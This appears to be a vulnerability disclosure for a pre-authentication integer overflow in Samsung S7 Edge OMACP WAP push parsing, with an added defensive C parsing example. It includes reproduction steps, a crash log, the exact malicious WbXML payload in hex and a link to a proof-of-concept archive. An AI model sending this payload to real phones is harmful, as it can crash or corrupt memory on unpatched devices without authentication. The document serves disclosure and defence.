OMACP is a protocol supported by many mobile devices which allows them to receive provisioning information over the mobile network. One way to provision a device is via a WAP push SMS message containing provisioning information in WbXML.
A malformed OMACP WAP push message can cause memory corruption on a Samsung S7 Edge device when processing the String Extension portion of the WbXml payload. This is due to an integer overflow in memory allocation for this string.
While OMACP WAP pushes require authentication, the entire WbXml payload of a push is parsed to extract the credentials, so this bug occurs pre-authentication.
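
The class of bug described above, seen from the parser's side, as an added example (not Samsung's code, which the page does not show). It assumes the string is prefixed by a WBXML multi-byte length (mb_u_int32); the function names are hypothetical. The length is decoded with a 32-bit overflow check and bounded by the bytes remaining before anything is allocated.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Decode a WBXML mb_u_int32 (7 value bits per byte, high bit = "more").
 * Returns bytes consumed, or 0 if truncated or wider than 32 bits. */
static size_t read_mb_u_int32(const uint8_t *p, size_t avail, uint32_t *out)
{
    uint32_t v = 0;
    for (size_t i = 0; i < avail && i < 5; i++) {
        if (v > (UINT32_MAX >> 7))      /* next shift would drop bits */
            return 0;
        v = (v << 7) | (p[i] & 0x7f);
        if (!(p[i] & 0x80)) {
            *out = v;
            return i + 1;
        }
    }
    return 0;                           /* truncated, or more than 5 bytes */
}

/* Hypothetical helper: copy a length-prefixed string out of the payload.
 * Returns a NUL-terminated heap copy, or NULL if the field is malformed. */
char *copy_prefixed_string(const uint8_t *buf, size_t buflen, size_t *used)
{
    uint32_t len;
    size_t n = read_mb_u_int32(buf, buflen, &len);
    if (n == 0) return NULL;
    /* Bound len by the bytes present BEFORE computing len + 1: an unchecked
     * 32-bit len + 1 wraps to 0 for len == 0xFFFFFFFF (undersized buffer). */
    if (len > buflen - n) return NULL;
    char *s = malloc((size_t)len + 1);
    if (s == NULL) return NULL;
    memcpy(s, buf + n, len);
    s[len] = '\0';
    *used = n + len;
    return s;
}

int main(void)
{
    /* Constructed input: 5-byte length with every value bit set (35 bits). */
    const uint8_t bad[] = {0xff, 0xff, 0xff, 0xff, 0x7f, 'x'};
    size_t used;
    return copy_prefixed_string(bad, sizeof bad, &used) == NULL ? 0 : 1;
}
```

Because the payload is parsed before credentials are checked, these bounds checks have to live in the parser itself rather than behind the authentication step.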
To reproduce the issue:

1) install the attached Android application on a different phone than the one being tested for the issue
2) manually give the application SMS permissions in the settings screen
3) start the app and enter the phone number on the target device
4) press the "send wap push" button

The target phone will crash:

02-20 15:52:56.952 15197 15197 F DEBUG : pid: 15180, tid: 15196, name: IntentService[S >>> com.wsomacp <<<
02-20 15:52:56.952 15197 15197 F DEBUG : signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x731a800000

The WAP payload causing this problem is:
690b6d0733b401506694f4c6504cf6be7224df6199a9c0ec4b76db1f6e262c457fc0553dbb50863dfce2d5c55077c3ffffffff7f777777770A0604B6B6B6B6.
Code for the test app is also attached.
This was tested on Samsung build number NRD90M.G93FXXU1DQJ8, which is the most recent update on my device.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44724.zip